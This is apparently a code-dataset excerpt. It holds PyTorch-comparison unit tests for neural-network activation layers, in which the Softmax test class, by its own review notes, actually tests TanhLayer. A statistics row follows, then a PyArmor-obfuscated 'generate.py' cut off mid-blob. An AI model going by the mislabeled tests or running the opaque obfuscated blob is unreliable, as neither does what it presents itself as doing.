        self.assertClose(dx_expect, dx_actual)

    def test_foward_case_1(self):
        self._check_forward(np.array([[1.0, 2.0], [3.0, 4.0]]))

    def test_forward_case_2(self):
        self._check_forward(np.array([[-3.0, 4.0]]))

    def test_backward_cast_1(self):
        self._check_backward(np.array([[1.0, 2.0], [3.0, 4.0]]))

    def test_backward_cast_2(self):
        self._check_backward(np.array([[-3.0, 4.0]]))
class SigmoidLayerTest(common.DlTestBase):
    """Check SigmoidLayer forward/backward against torch.sigmoid."""

    name = "SigmoidLayer"
    module_name = __module__

    def setUp(self):
        super().setUp()
        # Seed every RNG so runs are deterministic.
        random.seed(1)
        np.random.seed(1)
        torch.manual_seed(1)

    def tearDown(self):
        super().tearDown()

    def _check_forward(self, x):
        # Forward output must match PyTorch's sigmoid in shape and value.
        layer = SigmoidLayer()
        layer.initialize_parameters()
        actual = layer.forward(x)
        expect = self.torch_to_numpy(torch.sigmoid(self.numpy_to_torch(x)))
        self.assertEquals(expect.shape, actual.shape)
        self.assertClose(expect, actual)

    def _check_backward(self, x):
        # Gradient w.r.t. x must match PyTorch autograd with an all-ones
        # upstream gradient.
        layer = SigmoidLayer()
        layer.initialize_parameters()
        y = layer.forward(x)
        dx_actual = layer.backward(np.ones(y.shape))
        x_torch = self.numpy_to_torch(x, requires_grad=True)
        y_torch = torch.sigmoid(x_torch)
        y_torch.backward(gradient=torch.ones(y_torch.shape))
        dx_expect = self.torch_to_numpy(x_torch.grad)
        self.assertEquals(dx_actual.shape, dx_expect.shape)
        self.assertClose(dx_expect, dx_actual)

    def test_foward_case_1(self):
        self._check_forward(np.array([[1.0, 2.0], [3.0, 4.0]]))

    def test_forward_case_2(self):
        self._check_forward(np.array([[-3.0, 4.0]]))

    def test_backward_cast_1(self):
        self._check_backward(np.array([[1.0, 2.0], [3.0, 4.0]]))

    def test_backward_cast_2(self):
        self._check_backward(np.array([[-3.0, 4.0]]))
class TanhLayerTest(common.DlTestBase):
    """Check TanhLayer forward/backward against torch.tanh."""

    name = "TanhLayerTest"
    module_name = __module__

    def setUp(self):
        super().setUp()
        # Seed every RNG so runs are deterministic.
        random.seed(1)
        np.random.seed(1)
        torch.manual_seed(1)

    def tearDown(self):
        super().tearDown()

    def _check_forward(self, x):
        # Forward output must match PyTorch's tanh in shape and value.
        layer = TanhLayer()
        layer.initialize_parameters()
        actual = layer.forward(x)
        expect = self.torch_to_numpy(torch.tanh(self.numpy_to_torch(x)))
        self.assertEquals(expect.shape, actual.shape)
        self.assertClose(expect, actual)

    def _check_backward(self, x):
        # Gradient w.r.t. x must match PyTorch autograd with an all-ones
        # upstream gradient.
        layer = TanhLayer()
        layer.initialize_parameters()
        y = layer.forward(x)
        dx_actual = layer.backward(np.ones(y.shape))
        x_torch = self.numpy_to_torch(x, requires_grad=True)
        y_torch = torch.tanh(x_torch)
        y_torch.backward(gradient=torch.ones(y_torch.shape))
        dx_expect = self.torch_to_numpy(x_torch.grad)
        self.assertEquals(dx_actual.shape, dx_expect.shape)
        self.assertClose(dx_expect, dx_actual)

    def test_foward_case_1(self):
        self._check_forward(np.array([[1.0, 2.0], [3.0, 4.0]]))

    def test_forward_case_2(self):
        self._check_forward(np.array([[-3.0, 4.0]]))

    def test_backward_cast_1(self):
        self._check_backward(np.array([[1.0, 2.0], [3.0, 4.0]]))

    def test_backward_cast_2(self):
        self._check_backward(np.array([[-3.0, 4.0]]))
class SoftmaxLayerTest(common.DlTestBase):
    """Test case nominally for the softmax layer.

    NOTE(review): despite the class name, every test here instantiates
    ``TanhLayer`` and compares against ``torch.tanh`` — an apparent
    copy/paste of ``TanhLayerTest``. ``SoftmaxWithLossLayer`` (imported at
    the top of this file) is never exercised. Confirm the intended layer
    and its ``forward``/``backward`` signature (a loss layer likely also
    takes targets) before rewriting these tests.
    """
    name = "SoftmaxLayerTest"
    module_name = __module__
    def setUp(self):
        # Seed every RNG so runs are deterministic.
        super().setUp()
        random.seed(1)
        np.random.seed(1)
        torch.manual_seed(1)
    def tearDown(self):
        super().tearDown()
    def test_foward_case_1(self):
        # NOTE(review): uses TanhLayer, not a softmax layer — see class docstring.
        layer = TanhLayer()
        layer.initialize_parameters()
        x = np.array([[1.0, 2.0], [3.0, 4.0]])
        actual = layer.forward(x)
        x_torch = self.numpy_to_torch(x)
        expect_torch = torch.tanh(x_torch)
        expect = self.torch_to_numpy(expect_torch)
        self.assertEquals(expect.shape, actual.shape)
        self.assertClose(expect, actual)
    def test_forward_case_2(self):
        # NOTE(review): uses TanhLayer, not a softmax layer — see class docstring.
        layer = TanhLayer()
        layer.initialize_parameters()
        x = np.array([[-3.0, 4.0]])
        actual = layer.forward(x)
        x_torch = self.numpy_to_torch(x)
        expect_torch = torch.tanh(x_torch)
        expect = self.torch_to_numpy(expect_torch)
        self.assertEquals(expect.shape, actual.shape)
        self.assertClose(expect, actual)
    def test_backward_cast_1(self):
        # NOTE(review): uses TanhLayer, not a softmax layer — see class docstring.
        layer = TanhLayer()
        layer.initialize_parameters()
        x = np.array([[1.0, 2.0], [3.0, 4.0]])
        y = layer.forward(x)
        dy = np.ones(y.shape)
        dx_actual = layer.backward(dy)
        x_torch = self.numpy_to_torch(x, requires_grad=True)
        y_torch = torch.tanh(x_torch)
        dy_torch = torch.ones(y_torch.shape)
        y_torch.backward(gradient=dy_torch)
        dx_torch = x_torch.grad
        dx_expect = self.torch_to_numpy(dx_torch)
        self.assertEquals(dx_actual.shape, dx_expect.shape)
        self.assertClose(dx_expect, dx_actual)
    def test_backward_cast_2(self):
        # NOTE(review): uses TanhLayer, not a softmax layer — see class docstring.
        layer = TanhLayer()
        layer.initialize_parameters()
        x = np.array([[-3.0, 4.0]])
        y = layer.forward(x)
        dy = np.ones(y.shape)
        dx_actual = layer.backward(dy)
        x_torch = self.numpy_to_torch(x, requires_grad=True)
        y_torch = torch.tanh(x_torch)
        dy_torch = torch.ones(y_torch.shape)
        y_torch.backward(gradient=dy_torch)
        dx_torch = x_torch.grad
        dx_expect = self.torch_to_numpy(dx_torch)
        self.assertEquals(dx_actual.shape, dx_expect.shape)
        self.assertClose(dx_expect, dx_actual)
| 29.662539 | 60 | 0.623526 | 1,298 | 9,581 | 4.355932 | 0.050847 | 0.042448 | 0.070746 | 0.073576 | 0.937213 | 0.937213 | 0.937213 | 0.937213 | 0.937213 | 0.937213 | 0 | 0.017489 | 0.259994 | 9,581 | 322 | 61 | 29.754658 | 0.779972 | 0 | 0 | 0.924303 | 0 | 0 | 0.005637 | 0 | 0 | 0 | 0 | 0 | 0.12749 | 1 | 0.095618 | false | 0 | 0.023904 | 0 | 0.167331 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9bbddde2fc312ce2fba47aff220f4443f0cf9722 | 25,147 | py | Python | generate.py | Rukhmini/ADGAN-Self-attention-U-Net | 0450094ef479f5e33755c5d5497c07235f5a9cc4 | [
"MIT"
] | null | null | null | generate.py | Rukhmini/ADGAN-Self-attention-U-Net | 0450094ef479f5e33755c5d5497c07235f5a9cc4 | [
"MIT"
] | null | null | null | generate.py | Rukhmini/ADGAN-Self-attention-U-Net | 0450094ef479f5e33755c5d5497c07235f5a9cc4 | [
"MIT"
] | null | null | null | from pytransform import pyarmor_runtime
pyarmor_runtime()
__pyarmor__(__name__, __file__, b'\x50\x59\x41\x52\x4d\x4f\x52\x00\x00\x03\x06\x00\x33\x0d\x0d\x0a\x09\x2e\xa0\x01\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\x36\x18\x00\x00\x00\x00\x00\x08\x52\x24\xb5\x2c\xfa\x0e\xc4\x0d\x5e\xbf\xc0\x10\x8e\x80\xac\x7b\x00\x00\x00\x00\x00\x00\x00\x00\x59\xeb\x1d\x5e\xf7\x37\x12\x93\x42\x78\x7e\x0a\xcf\x25\x9a\x82\x0c\xeb\x59\xf3\xa0\xc1\xe6\x77\x6f\xd5\x6f\x7e\x23\x6b\xb0\x41\xc2\x74\xf7\x79\x8a\xbf\xe4\x5d\xc4\x9c\x76\x94\xf0\x19\x28\xe0\xcc\xcc\x15\x16\x6a\xa2\x90\x35\x99\xd6\x93\xba\x4e\xdb\x71\x04\xff\x1a\xce\xa7\x3f\x78\x3b\x53\x5e\x00\xd1\x25\x62\xd3\x98\xa4\x26\xff\xfd\x43\xbe\xe5\xa0\x20\x30\x53\x05\x16\xbf\xab\xcc\x04\x8d\x57\x34\x36\x6d\x9b\x8e\xf1\x79\x5a\x4a\x10\xd5\xd3\xdc\x07\x66\x2c\x18\xcd\xa3\xc5\x38\x8d\x0b\x1f\x6b\x5c\xd2\xe1\xfe\xbd\xcf\x03\xc7\xff\xba\x63\x24\x3d\x51\x24\x9b\x24\xaf\xd4\x8a\xbc\xd5\x96\x69\x3b\x69\xba\xed\x14\x92\xdb\xc9\xcd\x6c\x32\x01\x85\xc9\xf0\x0a\xd1\x5e\x27\xd4\x38\x56\xbb\xf4\xa1\x3d\x4b\xa4\x26\xd3\x99\x9a\x6a\x4f\xa5\x75\x1c\xb8\x6e\xf2\xa8\x00\x56\xcf\x60\x7b\x0f\xd9\xe9\x0d\xf8\xc2\xec\x13\xfc\xdf\xef\x4b\x67\x0d\xba\xa2\x53\x0a\x67\xbf\xe0\x15\xa0\xfc\xa2\xda\x0c\xc6\x06\xe6\x33\xe1\x5d\x1f\x8e\x74\xac\xee\x19\x78\xc4\x0a\x64\x71\xd7\x2c\x52\x8f\xd8\x49\x32\x43\x9c\xcb\x05\x74\x09\x4a\x8d\xaf\x43\x32\x62\x36\xe3\xcb\x87\x30\xc6\x57\xa8\x24\x91\xf7\xe1\xa2\xbf\xcc\x32\xc9\xd1\x82\x09\x6f\xe3\x7b\x46\xcc\x6c\x3b\x47\x85\x1b\xc1\x8c\x7b\x7e\xec\x71\x94\x96\x08\xa7\x8c\xd3\xaa\xea\x0f\x08\x6b\x84\x14\x1e\xbf\x9b\xa7\xa7\x08\xe1\xc7\xa7\xc3\xef\x7b\xdb\x8a\x06\xe1\xe8\x5c\xa6\xbc\xe3\x77\x66\xe8\xb6\x6d\xbf\xd2\x18\x35\xc1\xa5\x31\x7c\x13\x77\x35\x50\xd0\xfd\xc9\x8f\x2f\x0e\x96\x05\x11\x07\xc4\x3e\xd3\xfc\xe7\xe4\x32\x8b\xc5\x6d\xd7\xb4\x55\xb8\xb2\x2c\xb4\x6d\xcb\x4b\x1b\x12\x90\xa5\x17\x96\xd8\x73\xa4\x5e\x00\xf4\xf5\x19\x18\xc1\xe0\x64\xc0\x0f\xd0\x2a\xe9\xca\xdc\xb3\xb3\xd7\xb4\xad\xe8\x93\x13\xb5\xa4\x4f\x6f\x06\x59\xb1\x06\xcc\x4c\xb7\x7b\xd4\xda\x0b\x86\x46\xd1\x4f\x63\xc0\x
bb\xae\x32\xf4\x7f\x40\xee\x85\xad\x0b\x35\x08\xfe\x7c\x88\x3b\xc7\x3d\x31\x2d\x20\x0d\x59\xef\x59\xe3\x4f\x3c\x10\xb2\x7c\x99\x5c\xc1\x81\x94\xd4\x56\x28\x7d\x85\xd2\x35\xf3\x3e\x68\xa6\x82\x5e\x8b\x75\x99\x19\xdc\x3b\x0b\x13\xcb\x6d\xd5\x64\x8c\x00\xe0\xc2\xbd\x34\x3b\x22\x1d\xfd\xff\xcd\x59\x08\x11\x68\x01\x23\xb6\x61\xa1\x16\x5e\x9c\xdd\x66\xff\xb4\x7d\x4a\xe8\x22\x1d\x15\x86\xda\x5c\x48\x3c\xa4\x9b\x4b\x29\x4a\x08\xd9\x73\xad\x62\x43\xf6\x7d\x7a\xac\x9a\x19\xd7\x71\x38\x72\x46\xdb\x50\x86\x68\x11\x7d\x40\xcc\xab\xc6\x6c\x23\x00\x7a\x7f\x3e\x7c\xd4\xdd\xaa\xff\x6b\xd0\x9a\x13\x3b\x1b\x9b\x88\xdf\xf0\x3d\x72\xe6\x03\xb5\x43\xe3\x3d\x83\x2b\x46\xc8\xa5\x5c\xf1\x52\xc8\x4a\x81\xa3\x10\xae\x72\x89\xa6\xa8\xd0\x6d\xd1\x91\xfd\x1f\xe6\x13\x6b\x78\x98\x3c\xf6\x1b\x41\x77\x0f\x23\x6e\x01\x0a\xff\xee\x98\x90\x34\x21\xc5\xa2\xc2\x72\x7d\xed\xba\xb1\x97\xd7\xb5\x88\xb8\xd4\xbc\x8a\xc1\x09\xe2\xc3\xdc\xb6\x60\x3d\x43\xe4\x88\x76\xac\x20\x89\xad\x77\x01\x6c\x49\xef\xa1\xa7\xbe\xaf\x83\x6c\xa6\x86\x81\x00\x15\xd4\x9f\xbb\xdb\x0c\xf0\xca\x5a\xe4\xdd\xeb\xfd\x2a\x21\x76\xf3\x62\x40\x55\x7c\xa5\x03\xb3\xa0\xc8\x2b\xa3\xbf\xdb\xc2\xff\x3b\x9b\xd3\xfe\xa8\xa7\xfb\x0f\xc2\x3e\xbb\x14\x17\xa3\x23\xd1\xa6\xa5\xb7\x04\x5d\xa0\x20\xcb\xdf\x69\x99\xd1\xb0\x7c\xcc\x73\x26\x1a\x73\xcf\x9a\xb6\x12\x88\xe0\x10\x7d\x9f\xc9\xc2\x21\xe6\x67\x04\x77\xd5\x5a\xaf\xbf\xd0\xae\x8d\x64\x6f\x02\x94\xc5\x73\x33\xbc\xaa\x58\xc6\x63\x72\xc4\x60\xb8\xc2\x92\x44\x91\x67\x03\x83\xd6\x41\xa8\xa9\x6e\x22\x16\x7b\x70\xe4\xef\x7c\xca\xed\x17\x06\xb0\xce\xa5\x16\xd0\x56\x38\xad\xc1\x93\x4d\xfd\xc4\xe5\x49\x7e\x53\xe1\x08\xe2\x2e\x1e\xed\xd9\x56\x61\x4b\xba\x1c\x89\x5d\x80\x10\x29\x21\x16\x41\xcf\x01\x80\x1a\x9d\x8a\xf0\xff\xef\x71\x5d\x44\x45\x1f\x9f\x8e\xcd\x4d\xe5\x05\xec\x12\xfe\x87\x01\x3b\xbd\x52\x71\x51\xef\xd4\xa8\xd2\x48\xb3\x3d\x89\x15\x7c\x4c\x72\xde\x9e\x7d\x24\x8c\xe6\x91\xa3\x39\x4a\x0b\xa8\x3e\x83\x98\x24\x1e\x0a\x4e\x05\xdf\xab\x9b\x78\x2b\x79\x44\x00\x80\x50\x7b\x22\x3c\xd3\xdd\xdb\x6e\x4d\xde\x
13\x9c\xd7\xa6\xe5\x49\x81\x74\x13\x1f\x35\x90\x35\x60\x21\xa3\xff\x0d\x46\xa7\x92\x39\x2b\xe5\x6c\x6d\xb7\xd5\xfd\xa5\xf3\xcf\x8a\xa5\x25\xb1\x80\x1c\x4a\xab\x45\xc5\x4e\x05\x45\x1d\x3b\xe6\xd1\xad\x01\x0f\xb6\x42\xcf\x4a\xce\xb7\x90\xef\x81\x00\xa0\x5b\x3e\xce\x92\x66\xa1\x7e\xb8\x01\x53\x0d\xf9\x9a\x68\x2b\xa9\x24\x7b\xbb\xa5\x20\xac\x66\x96\x5e\x04\xd7\x5f\x4c\x08\xf8\xfc\xc7\x9c\xa1\xdc\xda\x79\x3b\xfb\x7d\x00\x96\x9c\x39\x3d\x1d\x50\x56\x1d\xb9\xf2\x19\xac\x04\x14\x24\xeb\xbd\x49\x6c\x8d\xb4\x43\xe6\x7b\x46\x99\xad\xd7\x72\x21\x58\x13\x10\x28\xb1\xe3\x76\x18\x8a\x6f\xb5\x78\x91\xcc\xca\xdc\xcf\xfd\x51\x1c\x90\x92\x51\xcf\x50\x85\xad\x40\x59\x21\x12\xc3\x8f\x69\xd1\x50\xa2\xc5\x65\x99\xb5\x67\x3e\x39\x93\x22\x37\xbb\x44\x32\xac\x2e\xc6\x8c\x59\xc2\xe5\xf9\x8a\x53\xb5\x76\x26\x9a\x77\x4b\xec\x74\xba\xac\x26\x2b\xe3\x58\x0d\xd1\xda\x63\x08\xff\x97\x31\xd3\xf9\xf8\x44\xc9\x1d\x35\x7d\x17\xce\xbe\xec\x6d\xc1\x9e\x83\xf9\x67\x1d\x6c\x00\x78\x62\x02\x5a\xcb\x2f\xe8\x56\x7e\x36\x9e\x6b\xd5\xe1\x7a\xa3\xca\xa0\x8e\x86\x55\x32\xea\x8b\x1a\xea\x3c\xd9\xd4\xb0\xd2\xd5\x84\x54\xd6\xb4\xa9\x50\x14\x41\x9b\x69\x23\x4a\x83\xa5\x9f\xb7\x5c\x49\x28\xf7\xb3\x82\x74\x95\xfe\xfb\xd9\x5e\x85\xe5\x91\x85\xd0\x04\x11\xad\xfa\x17\xab\x67\xd0\xa0\x0f\x68\xfe\x2d\x52\x17\x25\x8e\x61\x7f\x9f\x7f\x3a\x5d\xd0\xa1\x80\xdc\xad\x7a\xdd\xae\x3c\x20\x53\xc5\x1d\xdc\xab\x07\xe1\x99\x08\x36\x44\x79\x5b\x15\x05\x65\x98\x7c\x21\xb1\x59\xfe\x81\x08\x34\x51\x98\x83\x14\xeb\x8c\xbc\xf2\x50\x91\xfb\x80\xa0\xcd\x4d\x9f\x96\x80\xbd\xf6\x34\x10\xeb\x49\xfe\x2a\xf5\xc0\xcf\x0e\x8b\x5e\xad\xcd\xd7\xc4\x97\x1f\x97\x5d\xce\x13\xcf\x88\xed\xa9\xcc\x11\x1c\xa8\x4a\x7c\x3a\xf3\xff\xa2\x68\x3e\xbf\xa3\x5c\x7a\x1e\x7e\x1e\x7b\x27\x16\xd6\xc5\xfd\x97\x25\x84\xd7\x54\x27\x21\x9b\x0b\x32\x73\xd3\xd4\x78\x55\xd5\xad\xcb\x3f\x54\xf4\x91\x47\x5c\xaa\xeb\xdd\x40\xe2\xe2\x20\x57\xd8\x18\x7e\x82\xd0\x84\xf8\x1e\x58\xf0\x67\xbc\xe8\x1f\x92\x24\xae\xb5\x72\xe8\x22\x5a\xb0\xd4\x78\x31\x8b\x27\x97\xd3\x84\xfc\xab\xd8\x86\x41\x
a4\x09\x32\xec\xed\xb1\x6c\x19\x65\xe0\x6c\x1f\x1d\x53\x39\x2b\x22\x29\x5a\xc4\xe4\x9f\xe8\xdd\x69\x0e\x64\x55\x78\xc1\x01\x1b\x2e\xbd\xf5\x5f\x8f\xb2\xa4\x22\xb9\x04\x4e\x40\x23\x59\xe6\x45\xa6\x65\xff\xaf\x39\x49\x14\xbe\x94\x3d\x33\xa8\xd8\x3c\xcf\x04\x3e\x8d\xc3\xe1\xd1\x42\x09\x15\x75\xe9\xe0\x3f\x8b\xe1\x2b\xba\xec\x89\x73\x7d\x7f\xab\xaf\x1c\xd0\x4d\x67\x2c\x77\x34\xf7\xbd\xdc\x75\xaf\xd2\x7a\xa2\x1a\x2b\x0e\x61\x55\xed\x68\x2a\x3e\x05\xb1\x23\xe0\xf4\x9a\x67\x5d\x46\x3a\xfe\xd2\x05\x5e\x66\x99\x76\x9b\x6e\xc4\xe3\x31\x92\x7d\x11\x5a\xce\xb4\xa5\xd8\x9a\x54\x3e\x05\xfc\xef\x71\x06\x1a\xdf\xcd\x3d\x55\xa0\x59\x63\x8d\xe9\xab\x7d\x39\x85\x2c\x43\x7b\xf4\xaa\xa5\x61\xb4\x65\x4f\x87\x09\xbe\xe7\xbd\x09\x0d\x7f\xc5\x39\xe7\x20\x86\xa6\x81\xa3\x94\x9f\x23\xc2\xf6\x4a\x2a\x70\x15\x10\x9f\x8a\x45\xe1\x30\x3d\x5c\x19\x84\x39\xe7\x15\x79\x9a\x58\xa1\xf3\x1d\x54\x6d\xdd\xe5\xbd\x88\x36\x2e\x46\x35\x1b\x03\xf8\xec\xd0\x88\x73\xc2\xc9\x54\x41\x6f\x5e\x15\xc6\x9f\xdf\xdb\x39\x38\x23\xa4\x0b\x27\xe7\xa0\xe3\x97\x0a\xb6\x83\xe2\xf3\x74\x3d\x5b\xb6\x9c\x1c\x43\x9d\x06\xd9\x62\x9f\x8d\x72\x94\xc6\x1b\x6b\xe8\x78\x6e\x16\xc7\xad\x39\xe7\x09\x2c\x0d\x8a\x68\xc2\x92\xec\x23\x90\x9e\x5a\x7b\xef\x05\x33\xb0\xb6\x65\x95\x44\x5f\x40\x72\xed\xd2\xfb\xe7\x1d\x3c\x43\x26\x3a\x0c\x8b\xb5\x42\x91\x29\x42\x93\x7a\xc5\xab\x88\x12\xb9\x38\x5f\x85\x50\x74\xcd\x1c\x55\xd0\x4d\xc1\x1e\xf7\x78\x9e\x4f\x0b\xa1\xa7\xe7\xf7\x23\x9e\x4a\x3b\xbb\x6f\x20\xfb\xb2\xdf\x49\x88\xc6\x87\x91\xeb\x57\x69\xa9\xeb\x77\x74\x27\x46\xef\x12\xd1\x85\x10\xdd\x18\x24\x18\xc8\xe6\xd6\x91\xf1\x3d\x84\x22\xff\x81\xfc\x50\x4a\xbe\x1e\xe7\xa9\xa1\xd3\xd3\xf8\x97\x44\xa4\x23\xce\x13\x69\xa6\x34\x62\xcc\xe3\x57\x5e\x9c\x82\xe3\xdb\x07\xd1\xaf\x9b\x8f\xdc\x97\xeb\xda\xb6\x54\x93\x3e\x3b\x3f\x9a\xd6\x8d\xa5\xf6\x01\x0b\x61\x4c\x7a\x4d\x03\x39\x00\xf3\x12\x81\x5f\xe1\x65\xea\x3c\x16\xfa\x8f\xf7\xe9\xe7\x78\x37\xbe\x23\xf7\x21\x8e\x23\x62\x8e\xbb\xd3\x42\xf5\x25\xa4\x1c\xc7\xc2\x2c\x78\x29\x8f\x5e\xd8\xad\x3e\xea\xb8\xc6\xbf\x
c9\x3c\x1f\xcb\x6c\x24\x31\x68\x1a\x70\xd8\x51\xf0\x6a\xbf\x09\x02\xb0\xe3\xed\x41\x8e\xe2\x36\x5f\xd9\x17\x26\x45\x4f\xa6\x1d\xdd\x3e\xbb\x2e\x24\xc9\x6a\xac\x44\xa4\x35\xe1\x5e\xe7\xe5\x78\x83\x2d\xbc\xd7\x29\x8c\x2d\x42\x03\x0d\xb7\xab\xb8\xba\x6e\xae\x22\x63\xb2\xa3\x4b\x7d\x08\xf0\xc0\xe2\x76\xd9\x57\x3b\x01\x56\x5b\x35\xf9\xab\xe4\xcb\xd6\x96\x64\x8d\x62\x36\x2e\x94\xdd\x4d\xdc\x44\x3f\x77\x1e\x9a\xde\xfc\x4a\xc2\x3e\x74\x5a\x5d\xb3\xb0\xc0\x29\x84\x95\x60\x0a\x43\x13\x93\x82\x6f\x05\x18\x54\x74\x6b\xd0\x8f\x94\xb2\x82\x0c\x66\xf2\xd7\x0e\x49\x72\x4e\x8f\xd2\x42\x2d\x15\x8c\x80\x67\x8c\x0f\x26\x7b\x40\x8c\x6a\x25\xba\x4c\x79\xa3\x27\x64\xf2\x03\x1f\xfe\x79\x9e\x9a\x55\x2c\x4e\x20\xef\x91\x0c\x9c\x4b\xc9\xc5\xab\x2b\x51\x38\x64\x91\x9c\x56\x9e\xe6\x9a\x4e\x44\xe8\xe6\x0f\x79\xf0\xc3\x15\x7d\x07\x6e\x4f\xd8\x65\xee\x7b\xdd\x3b\x52\xf1\xc0\xfc\xeb\x08\xd4\x04\x4c\x77\x41\x11\x5b\x11\xed\x9d\x42\x7c\x49\x17\x7e\x48\x5f\xef\xbb\x98\x85\x3a\xe9\xe0\xcc\xa5\x51\x6d\x81\xac\x06\xdc\x71\x2a\x36\x1a\xa5\xa4\xdd\x06\x61\x8e\x64\x08\xd3\x42\x32\xaa\x6b\x8c\xe6\x0d\xad\x70\x1d\x0f\x26\x1e\xf2\x2d\x1f\x1f\x15\x5c\x45\xfe\xe3\x17\xb2\x04\xa3\x13\x79\x16\xc3\x17\x02\x39\xd2\x2b\xb8\xd7\x18\x56\x1b\x4d\xd2\x07\x1c\x17\x9f\x48\xb7\x9a\x18\x4d\xe3\xd9\x96\x5b\x0a\xdf\xc6\x65\x4d\x14\xb0\x16\x42\xe1\x77\x82\x73\x8b\x03\x9d\x45\x95\xa6\x6b\x06\xa7\xc3\x3d\xe0\x0b\x2a\xa0\xfe\xb0\x3d\x8f\x84\x06\x89\x2d\x1d\x1c\x04\xc7\x9b\xe6\x8e\x9f\xd1\x49\xc2\x10\xd7\xd4\xc1\xd3\xdd\xff\x41\x64\x04\x7d\xa3\xaa\x20\xb9\x1f\x98\xfe\xe0\x1e\x28\xd7\xa7\xa5\x52\xe4\x1e\x6b\x98\xa3\x49\x8b\xc8\x3b\x38\x83\x2f\x0c\xaa\xdd\xc2\x59\x31\xbb\x1f\x2c\x20\xe9\x75\x35\x2b\x68\x54\xf3\x87\xb9\x03\x1a\x57\x24\x68\x58\x4d\x0c\xe2\x24\x60\xef\x91\x7a\xef\xa4\x9d\xf5\xa3\x88\x4e\x44\xaa\x72\x9a\x34\x26\xfe\x2b\xc9\xc9\x78\xed\x2e\x12\x61\x36\xe4\xb6\x96\x0e\x86\x7e\xea\x9b\x00\xab\xe9\x65\xa2\xe0\x26\x63\x25\xbb\xd2\xaa\xc9\x99\x64\x33\xf6\xc1\x51\xb5\xb4\xdc\xbb\x54\xfe\xec\x1f\x84\x0e\xf0\x9b\x62\x3a\x95\x45\x
96\x73\x60\x01\xa1\xf7\xe8\xf9\x38\x73\xf0\x05\xcc\x86\xb2\x61\xf7\x9b\x61\x1b\x45\x17\xa9\x56\xcf\x95\xce\x8f\x2d\xc6\xb4\x4c\xcc\x61\x12\x1e\xa1\xa3\x28\xa5\x26\x12\x7d\xb0\x4e\x3e\x95\xa0\x07\xc9\x11\x58\x8f\xdf\x42\x9d\xcc\xf4\x7e\x91\x73\xd0\x00\x40\x91\x17\x5d\x76\x05\x02\xdf\x71\x8e\x39\xdd\x52\x90\x58\xa8\xb4\xae\xc6\xb6\xde\xc4\x27\xcc\x74\xdc\x9a\x3c\xeb\x7f\x29\xc8\x3f\xba\x45\x67\xc1\xfb\xe0\x0c\xdd\xb0\x2b\xd1\xf6\xf4\x66\xa9\x28\xf2\x5a\x51\xa5\xba\xc1\x69\x51\x3e\xaa\xa2\xda\x97\x59\x8e\x2c\x7e\x20\x93\x89\xfa\x99\xec\x27\x62\xf6\x96\xf6\x18\xc3\xc4\xdd\xc6\xce\x1d\xa1\x44\xe4\x0c\xa5\x7c\x03\x6f\x9e\x3c\x72\xd5\x67\xcb\x27\x7a\xb8\x0b\x52\x0c\x38\x8b\x34\x64\xb5\x8c\x9e\xd2\xee\x74\x95\x28\x38\x97\x46\x37\x80\xc7\x86\xc5\x2f\xe1\xe0\x21\x2e\xa1\x81\x3f\xa2\x48\xb1\x13\xa9\x4c\x92\xbf\xdd\x54\x2a\x9f\xca\xe4\x96\xf9\xd7\xb4\x57\x0b\x3d\xbe\x42\x60\xa8\x26\x63\xdf\x8d\xd9\xf5\x87\x3d\x85\x1c\x6d\x67\x02\xd3\x50\xff\x7b\x18\x17\x31\x84\xf7\xb2\xda\xa9\xc0\xa6\x6f\x0e\x5a\x3b\xbc\x77\xbf\xbf\x16\x9a\x77\xf9\xca\x4c\x21\x25\x32\x0a\x1e\x16\x79\xdc\xf6\x40\x79\x68\xf8\x69\x48\xd4\xc5\x3f\x6d\xca\x03\xd7\xe2\xb7\xbd\x4a\x90\x9e\xca\x00\xb8\x25\x42\x3d\x77\xd2\x91\x4b\xe9\x64\xfc\x3f\x7f\xaa\x66\xa6\xa0\x77\xb3\xc3\x68\x4e\x6b\xea\xf9\xa2\xd9\x88\xc4\x03\x3a\x81\xef\xbc\x8d\x56\xfd\xb7\xa7\x26\xe9\x9b\x20\xfc\x04\x17\x25\xab\x3e\xf9\x34\xd9\xf8\xbb\xb2\xbe\xc1\x90\x20\x0c\xb0\x1c\xae\xee\xa2\x70\x02\x17\xb4\x3f\xce\x68\xd1\x50\xd1\x8a\x24\xfd\x98\x09\xc5\xc6\xcb\x22\x34\x1d\x1b\x88\xb2\xdf\x2b\x68\x89\xdb\x9e\xb2\xc0\x9e\xa1\x34\xaa\xbb\x28\xc2\x80\x2d\xd8\x1f\x2f\x90\x0d\x11\xf2\xd1\xe4\xa9\x0a\x07\x7e\x0d\x18\x5e\x83\xcc\xa1\x14\x9c\x42\x68\x61\x01\x0b\xa5\x0f\x6d\x94\xcb\xe3\xce\xeb\x21\x42\x30\x87\xb4\x2e\x07\x5d\x05\xc1\x49\x35\xa3\x05\x36\x21\x2e\xf7\x31\x4b\x2a\xdf\xb3\x40\x27\x25\xf2\x32\xd6\x6a\x15\x99\x95\x5d\xfd\x23\x6d\x39\x81\x17\x56\x35\xb0\x67\x8c\x89\xdd\xf6\x68\x88\x65\xcb\x6e\x01\x9b\xd6\xcc\x94\x2d\x1c\x3d\x95\xcb\x6c\x9c\x4f\x4a\xef\xf4\x
